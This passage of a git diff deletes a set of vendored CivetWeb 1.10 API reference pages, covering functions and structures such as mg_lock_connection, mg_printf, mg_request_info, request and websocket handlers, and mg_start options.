-| **32** | USE_LUA | *Support for Lua scripts and Lua server pages*. CivetWeb supports server side scripting through the Lua language, if that has been enabled at compile time. Lua is an efficient scripting language which is less resource heavy than for example PHP. |
-| **64** | USE_DUKTAPE | *Support for server side JavaScript*. Server side JavaScript can be used for dynamic page generation if the proper options have been set at compile time. Please note that client side JavaScript execution is always available if it has been enabled in the connecting browser. |
-| **128** | NO_CACHING | *Support for caching*. The webserver will support caching, if it has not been disabled while compiling the library. |
-
-The parameters can added using bitwise or. Values above 255 are reserved, the behavior of the function is undefined if any unknown bit is set.
-
-### See Also
-
-* [`mg_check_feature( feature );`](api/mg_check_feature.md)
-* [`mg_exit_library( feature );`](api/mg_exit_library.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md
deleted file mode 100644
index 167f922..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_lock_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-|**`conn`**|`struct mg_connection *`|The connection to retrieve a lock|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_lock_connection()` is specifically for websocket connections to lock connection. Using this function in combination with [`mg_unlock_connection();`](mg_unlock_connection.md) is necessary around [`mg_write()`](mg_write.md) and [`mg_printf()`](mg_printf.md) calls if the code has server-initiated communication, as well as with communication in direct response to a message.
-
-### See Also
-
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md b/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md
deleted file mode 100644
index 8be6bac..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_lock_context( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context to put the lock on|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_lock_context()` can be used to acquire a lock for exclusive access to resources which are shared between connection of threads. The lock is context wide. The lock must be released with a call to [`mg_unlock_context()`](mg_unlock_context.md).
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_md5.md b/thirdparty/civetweb-1.10/docs/api/mg_md5.md
deleted file mode 100644
index 067a6a2..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_md5.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_md5( buf, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`buf`**|`char[33]`|Storage buffer for the calculated MD5 sum|
-|**`...`**|`char *, ...`|NULL terminated list of pointers to strings with data|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`char *`|Pointer to the resulting MD5 string|
-
-### Description
-
-The function `mg_md5()` caluclates the MD5 checksum of a NULL terminated list of NUL terminated ASCII strings. The MD5 checksum is returned in human readable format as an MD5 string in a caller supplied buffer.
-
-The function returns a pointer to the supplied result buffer.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md b/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md
deleted file mode 100644
index edb5f02..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Civetweb API Reference
-
-### `mg_modify_passwords_file( passwords_file_name, domain, user, password );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`passwords_file_name`**|`const char *`|The path to the passwords file|
-|**`realm`**|`const char *`|The authentication realm (domain) of the user record|
-|**`user`**|`const char *`|Username of the record to be added, changed or deleted|
-|**`password`**|`const char *`|Password associated with the user or NULL if the record must be deleted|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_modify_passwords_file()` allows an application to manipulate .htpasswd files on the fly by adding, deleting and changing user records. This is one of the several ways to implement authentication on the server side.
-
-If the password parameter is not `NULL` an entry is added to the password file. An existing records is modified in that case. If `NULL` is used as the password the enrty is removed from the file.
-
-The function returns 1 when successful and 0 if an error occurs.
-
-### See Also
-
-* [`mg_check_digest_access_authentication();`](mg_check_digest_access_authentication.md)
-* [`mg_send_digest_access_authentication_request();`](mg_send_digest_access_authentication_request.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_option.md b/thirdparty/civetweb-1.10/docs/api/mg_option.md
deleted file mode 100644
index dd7f090..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_option.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_option;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`name`**|`const char *`|Name of the option|
-|**`type`**|`int`|Type of the option|
-|**`default_value`**|`const char *`|Value of the option|
-
-### Description
-
-A list of valid configuration options of the Civetweb instance can be retrieved with a call to [`mg_get_valid_options()`](mg_get_valid_options.md). This function fills a list of `struct mg_option` structures where the content of each structure represents a configuration option. Each structure contains three fields. One field contains the name of the option, the second contains the value of the option and the third is an identifier used to define the type of the option and how the value contents should be interpreted.
-
-The field `type` can be one of the following values:
-
-|Value|Description|
-| :--- | :--- |
-|**`CONFIG_TYPE_UNKNOWN`**|The type of the option value is unknown|
-|**`CONFIG_TYPE_NUMBER`**|The option value is an integer|
-|**`CONFIG_TYPE_STRING`**|The option value is a number|
-|**`CONFIG_TYPE_FILE`**|The option value is a file name|
-|**`CONFIG_TYPE_DIRECTORY`**|The option value is a directory name|
-|**`CONFIG_TYPE_BOOLEAN`**|The option value is a boolean|
-|**`CONFIG_TYPE_EXT_PATTERN`**|The option value is a list of regular expression patterns|
-
-### See Also
-
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_printf.md b/thirdparty/civetweb-1.10/docs/api/mg_printf.md
deleted file mode 100644
index 8beb9c0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_printf.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_printf( conn, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the data must be sent|
-|**`fmt`**|`const char *`|Format string|
-|**`...`**|*various*|Parameters as specified in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_printf()` can be used to send formatted strings over a connection. The functionality is comparable to the `printf()` family of functions in the standard C library. The function returns **0** when the connection has been closed, **-1** if an error occurred and otherwise the number of bytes written over the connection. Except for the formatting part, the `mg_printf()` function is identical to the function [`mg_write()`](mg_write.md).
-
-### See Also
-
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_read.md b/thirdparty/civetweb-1.10/docs/api/mg_read.md
deleted file mode 100644
index c7ec6c3..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_read.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_read( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`buf`**|`void *`| A pointer to the location where the received data can be stored |
-|**`len`**|`size_t`| The maximum number of bytes to be stored in the buffer |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| The number of read bytes, or a status indication |
-
-### Description
-
-The function `mg_read()` receives data over an existing connection. The data is handled as binary and is stored in a buffer whose address has been provided as a parameter. The function returns the number of read bytes when successful, the value **0** when the connection has been closed by peer and a negative value when no more data could be read from the connection.
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_request_info.md b/thirdparty/civetweb-1.10/docs/api/mg_request_info.md
deleted file mode 100644
index cad6bbc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_request_info.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_request_info;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`request_method`**|`const char *`| The request method used by the client for the connection this can be **GET**, **POST** or one of the other common HTTP request methods |
-|**`request_uri`**|`const char *`| The absolute, relative or URL-encoded URI as it was sent in the request.  Example: "http://mydomain.com:8080/path/to/file.ext" or "/path/to/file.ext", depending on the client. |
-|**`local_uri`**|`const char *`| The relative URL-encoded URI as it references the local resource. If the request URI does not reference a resource on the local server, this field is NULL.  Example: "/path/to/file.ext" (even if the client used "http://mydomain.com:8080/path/to/file.ext" in the request) |
-|~~`uri`~~|`const char *`| *Deprecated. Use* `local_uri` *instead* |
-|**`http_version`**|`const char *`| The HTTP version as mentioned in the client request. This can be "1.0", "1.1", etc. |
-|**`query_string`**|`const char *`| The HTTP query string, defined as URL part after the first '?' character, not including '?'. NULL if there is no '?'. |
-|**`remote_user`**|`const char *`| The name of the authenticated remote user, or NULL if no authentication was used. Only used for HTTP (digest) authentication, not for cookie based authentication. |
-|**`remote addr`**|`char[48]`| The IP address of the remote client as a string. This can either represent an IPv4 or an IPv6 address.  Example: "127.0.0.1" |
-|~~`remote_ip`~~|`long`| *Deprecated. Use* `remote_addr` *instead* |
-|**`content_length`**|`long long`| The content length of the request body. This value can be -1 if no content length was provided. The request may still have body data, but the server cannot determine the length until all data has arrived (e.g. when the client closes the connection, or the final chunk of a chunked request has been received). |
-|**`remote_port`**|`int`| The port number at the client's side (an integer number between 1 and 65535). |
-|**`is_ssl`**|`int`| 1 if the connection is over SSL (https), and 0 if it is a plain connection (http) |
-|**`user_data`**|`void *`| A pointer to the `user_data` information which was provided as a parameter to `mg_start()`. |
-|**`conn_data`**|`void *`| A pointer to connection specific user data |
-|**`num_headers`**|`int`| The number of HTTP request headers sent by the client (see http_headers) |
-|**`http_headers`**|`struct mg_header[64]`| Array of structures with the HTTP request headers sent by the client. For the number of filled header fields, ee num_headers. |
-|**`client_cert`**|`struct mg_client_cert *`| Pointer to the client certificate information, when available. This field is only filled for https connections using client certificates. |
-
-### Description
-
-The `mg_request_info` structure contains the client information of an existing connection.
-
-### See Also
-
-* [`struct mg_client_cert;`](mg_client_cert.md)
-* [`struct mg_header;`](mg_header.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_response_info.md b/thirdparty/civetweb-1.10/docs/api/mg_response_info.md
deleted file mode 100644
index a348dfc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_response_info.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_response_info;`
-
-### Fields
-
-struct mg_response_info {
-        int status_code;          /* E.g. 200 */
-        const char *status_text;  /* E.g. "OK" */
-        const char *http_version; /* E.g. "1.0", "1.1" */
-
-        long long content_length; /* Length (in bytes) of the request body,
-                                     can be -1 if no length was given. */
-
-        int num_headers; /* Number of HTTP headers */
-        struct mg_header
-            http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-};
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`status code`**|`int`| The HTTP response code received by the client. |
-|**`status_text`**|`const char *`| The textual representation of the HTTP status code. |
-|**`http_version`**|`const char *`| The HTTP version as mentioned in the client request. This can be "1.0", "1.1", etc. |
-|**`content_length`**|`long long`| The content length of the request body. This value can be -1 if no content length was provided. The request may still have body data, but the server cannot determine the length until all data has arrived (e.g. when the client closes the connection, or the final chunk of a chunked request has been received). |
-|**`num_headers`**|`int`| The number of HTTP request headers sent by the client (see http_headers) |
-|**`http_headers`**|`struct mg_header[64]`| Array of structures with the HTTP request headers sent by the client. For the number of filled header fields, ee num_headers. |
-
-Note: This structure is not yet feature complete and will be extended in future versions.
-
-### Description
-
-The `mg_response_info` structure contains information on a completed request from a client.
-
-### See Also
-
-* [`struct mg_header;`](mg_header.md)
-* [`mg_get_response_info();`](mg_get_response_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md b/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md
deleted file mode 100644
index 895ffdc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_chunk( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`chunk`**|`const void *`| A pointer to the blob of information to be sent |
-|**`chunk_len`**|`size_t`| The amount of bytes to be sent |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating the amount of bytes sent, or failure |
-
-### Description
-
-The function `mg_send_chunk()` can be used to send a blob of arbitrary data over a connection. 
-Only use this function after sending a complete HTTP request or response header with "Transfer-Encoding: chunked" set. Otherwise: use `mg_write()`.
-The function returns a number **>0** if data was sent, the value **0** when the connection has been closed, and **-1** in case of an error.
-
-### See Also
-
-* [`mg_write();`](mg_write.md)
-* [`mg_printf();`](mg_print.md)
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md b/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md
deleted file mode 100644
index d5af9da..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_digest_access_authentication_request( conn, realm );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`realm`**|`const char *`| The requested authentication realm or NULL |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating success or failure |
-
-### Description
-
-This function can be used to send a HTTP Digest Authentication request to the client.
-Browsers will react with repeating the request with user authentication data.
-If they do not yet know the user authentication for the requested realm, they will show
-a dialog to query username and password.
-In case the authentication realm (also called domain) is NULL, the parameter
-`authentication_domain` from the server configuration is used.
-The function returns a negative number on errors.
-
-### See Also
-
-* [`mg_check_digest_access_authentication();`](mg_check_digest_access_authentication.md)
-* [`mg_modify_passwords_file();`](mg_modify_passwords_file.md)
-* [`mg_send_http_error();`](mg_send_http_error.md)
-* [`mg_write();`](mg_write.md)
-* [`mg_printf();`](mg_print.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_file.md b/thirdparty/civetweb-1.10/docs/api/mg_send_file.md
deleted file mode 100644
index bffe075..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_file.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_file( conn, path );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_file()` sends the contents of a file over a connection to the remote peer. The function also adds the necessary HTTP headers.
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md b/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md
deleted file mode 100644
index 0c18d3e..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_http_error( conn, status_code, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the data must be sent|
-|**`status_code`**|`int`|The HTTP status code (see HTTP standard)|
-|**`fmt`**|`const char *`|Format string for an error message|
-|**`...`**|*various*|Parameters as specified in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-
-
-### Description
-
-The function `mg_send_http_error()` can be used to send HTTP error messages from a server to a client.
-The `status_code` must be one of the predefined HTTP standard error codes (e.g., "404" for "Not Found").
-The status text (e.g., "Not Found") for standard error codes is known by this function.
-A body of the error message, to explain the error in more detail, can be specified using the `fmt` format specifier and additional arguments. The `fmt` format specifier works like for the `printf()` function in the standard C library.
-
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_write();`](mg_write.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md b/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md
deleted file mode 100644
index 424b0dc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_mime_file( conn, path, mime_type );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-|**`mime_type`**|`const char *`|The mime type of the file, or NULL for automatic detection|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_mime_file()` sends a file over a connection including the HTTP headers. The function is similar to the [`mg_send_file()`](mg_send_file.md) with the additional functionality that the MIME type of the file can be specified. If the `mime_type` parameter is NULL, the routine will try to determine the MIME type based on the extension of the filename.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_file();`](mg_send_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md b/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md
deleted file mode 100644
index 1350df8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_mime_file2( conn, path, mime_type, additional_headers );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-|**`mime_type`**|`const char *`|The mime type or NULL for automatic detection|
-|**`additional_headers`**|`const char *`|Additional headers to be sent|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_mime_file2()` can be used to send a file over a connection. The function is similar to [`mg_send_mime_file()`](mg_send_mime_file.md) with the additional functionality that user specified headers can be sent. The MIME type of the file can be specified in the function call, or will be automatically determined based on the extension of the filename if the `mime_type` parameter has the value NULL.
-
-Additional custom header fields can be added as a parameter. Please make sure that these header names begin with `X-` to prevent name clashes with other headers. If the `additional_headers` parameter is NULL, no custom headers will be added.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_file();`](mg_send_file.md)
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md
deleted file mode 100644
index e969f03..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_server_ports;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`protocol`**|`int`|The protocol mask where `IPv4` is **1**, `IPv6` is **2** and both `IPv4` and `IPv6` is **3**|
-|**`port`**|`int`|The port number on which the service listens|
-|**`is_ssl`**|`int`|**0** for `HTTP` communication, **1** for `HTTPS`|
-|**`is_redirect`**|`int`|**1** if all requests are redirected, otherwise **0**|
-|**`_reserved1`**|`int`|Reserved for internal use|
-|**`_reserved2`**|`int`|Reserved for internal use|
-|**`_reserved3`**|`int`|Reserved for internal use|
-|**`_reserved4`**|`int`|Reserved for internal use|
-
-### Description
-
-A call to the function [`mg_get_server_ports()`](mg_get_server_ports.md) returns a list of structures with information about each running Civetweb service. These structures are of type `struct mg_server_ports` and contain the base information of each service.
-
-### See Also
-
-* [`mg_get_server_ports();`](mg_get_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md
deleted file mode 100644
index 302324a..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_auth_handler( ctx, uri, handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context on which the handler must be set|
-|**`uri`**|`const char *`|The URI for the authorization handler|
-|**`handler`**|`mg_authorization_handler`|Callback function doing the actual authorization|
-|**`cbdata`**|`void *`|Optional user data|
-
-`int mg_authorization_handler( struct mg_connection *conn, void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_auth_handler()` hooks an authorization function to an URI to check if a user is authorized to visit that URI. The check is performed by a callback function of type `mg_authorization_handler`. The callback function is passed two parameters: the current connection and a pointer to optional user defined data which was passed to `mg_set_auth_handler()` when the callback was hooked to the URI.
-
-The callback function can return **0** to deny access, and **1** to allow access.
-
-The `mg_set_auth_handler()` function is very similar in use to [`mg_set_request_handler()`](mg_set_request_handler.md).
-
-### See Also
-
-* [`mg_set_request_handler();`](mg_set_request_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md
deleted file mode 100644
index 95a09a0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_request_handler( ctx, uri, handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context where the handler must be active|
-|**`uri`**|`const char *`|The URI to hook the handler on|
-|**`handler`**|`mg_request_handler`|Callback function doing the heavy lifting|
-|**`cbdata`**|`void *`|Optional user supplied data|
-
-`int mg_request_handler( struct mg_connection *conn, void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_request_handler()` hooks a callback function on a URI. That callback function is called whenever a client requests the specific URI. The callback function receives the connection information and optional user supplied data as parameters and can serve information back to the client. When the callback function does not send any information back to the client, it should return **0** to signal Civetweb that the Civetweb core should handle the request. A return value between 1 and 999 is used to tell Civetweb that the request has been handled and no further processing is necessary. The returned code is stored as the status code in the access log, it is therefore recommended, although not mandatory to return a status code which matches the state of the request.
-
-### See Also
-
-* [`mg_set_auth_handler();`](mg_set_auth_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md b/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md
deleted file mode 100644
index adafc22..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_user_connection_data( conn, data );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|connection to add the user data|
-|**`data`**|`void *`|Pointer to the user data|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_user_connection_data()` can be used to set a user defined
-data pointer attached to a connection.  This value can be read using 
-`mg_get_user_connection_data()`.
-Any call to `mg_set_user_connection_data()` will overwrite a previously
-assigned user data pointer.
-
-`mg_set_user_connection_data()` requires a non-const 
-`struct mg_connection *` to set the user data pointer.  It is save to use the
-`const struct mg_connection *` passed to a websocket connect handler (with a
-const cast), since `const` just means you must not use `mg_read()` or
-`mg_write()` in this context.
-
-Alternatively, you can use the `init_connection` callback in 
-`struct mg_callbacks` to set the user data pointer.
-In this case, typically `init_connection` is used to allocate memory for
-a user defined `struct`, while `connection_close` is used to free this
-memory again.
-
-
-### See Also
-
-* [`mg_get_user_connection_data();`](mg_get_user_connection_data.md)
-* [`struct mg_callbacks`](mg_callbacks.md)
-* [`mg_set_websocket_handler();`](mg_set_websocket_handler.md)
-* [`mg_read();`](mg_read.md)
-* [`mg_write();`](mg_write.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md
deleted file mode 100644
index f838c81..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_websocket_handler( ctx, uri, connect_handler, ready_handler, data_handler, close_handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`mg_context *`|The context in which to add the handlers|
-|**`uri`**|`const char *`|The URI for which the handlers should be activated|
-|**`connect_handler`**|`mg_websocket_connect_handler`|Handler called when a connect is signalled|
-|**`ready_handler`**|`mg_websocket_ready_handler`|Handler called when the connection is ready|
-|**`data_handler`**|`mg_websocket_data_handler`|Handler called when data is received|
-|**`close_handler`**|`mg_websocket_close_handler`|Handler called when the connection closes|
-|**`cbdata`**|`void *`|User defined data|
-
-`int mg_websocket_connect_handler( const struct mg_connection *conn, void *cbdata );`
-`int mg_websocket_ready_handler( struct mg_connection *conn, void *cbdata );`
-`int mg_websocket_data_handler( struct mg_connection *conn, int opcode, char * buf, size_t buf_len, void *cbdata );`
-`int mg_websocket_close_handler( const struct mg_connection *conn,  void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_websocket_handler()` connects callback functions to a websocket URI. The callback functions are called when a state change is detected on the URI like an incomming connection or data received from a remote peer.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_start.md b/thirdparty/civetweb-1.10/docs/api/mg_start.md
deleted file mode 100644
index c597d55..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_start.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# Civetweb API Reference
-
-### `mg_start( callbacks, user_data, options );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`callbacks`**|`const struct mg_callbacks *`| A structure with optional callback functions to process requests from the web server |
-|**`user_data`**|`void *`| A pointer to optional user data |
-|**`options`**|`char **`| A list of options used to initialize the web server. The list consists of an NULL terminated list of option-value string pairs. |
-
-The option list can be used to set the following options:
-
-| Option | Default | Description |
-| :--- | :--- | :--- |
-| **`cgi_environment`** | *empty* | The option `cgi_environment` can contain extra variables to be passed to the CGI script in addition to the standard environment variables. The lust must be a comma separated list of name=value pairs like this: `VARIABLE1=VALUE1,VARIABLE2=VALUE2`.|
-| **`cgi_interpreter`**| *empty* | The option `cgi_interpreter` can contain a path to an executable which will be used as a CGI interpreter for **all** CGI scripts regardless of the script file extension. If this option is not set (which is the default), CivetWeb looks at the first line of a CGI script to see if an interpreter is defined there. This first line is formatted as a shebang line as common in unix style shell scripts, but this will also work in Windows. For more information about the syntax, please see the Wikipedia page about the [shebang line](http://en.wikipedia.org/wiki/Shebang_(Unix\)).|
-| | |For example on a Windows system where both PHP and Perl CGI scripts are used, `#!/path/to/php-cgi.exe` and `#!/path/to/perl.exe` must be the first line of the respective CGI scripts. Note that the paths should be either full file paths, or file paths relative to the current working directory of the CivetWeb server. The current working directory may be dependent on the way the application is started. When started from the command line it is the directory from where the executable was called, but when starting it from a shortcut in a graphical desktop environment, it will be the directory where the executable is located, the default directory of the user or a directory mentioned in the shortcut, depending on the operating system and graphical user interface used.|
-| | |If all CGIs use the same interpreter, it is more efficient to set the option `cgi_interpreter` to the path to that executable because in that case no processing of the shebang line is necessary. When using PHP, be sure to point tot php-cgi(.exe) and not the php(.exe) executable, as the latter is a stand alone interpreter which doesn't interface over CGI with CivetWeb.
-| **`cgi_pattern`** | `**.cgi$|**.pl$|**.php$` | All files that match `cgi_pattern` are treated as CGI files. The default pattern allows CGI files to be anywhere. To restrict CGIs to a certain directory, use `/path/to/cgi-bin/**.cgi` as a pattern. Note that the full path of the local file is matched against the pattern, not the URI provided in the client request.|
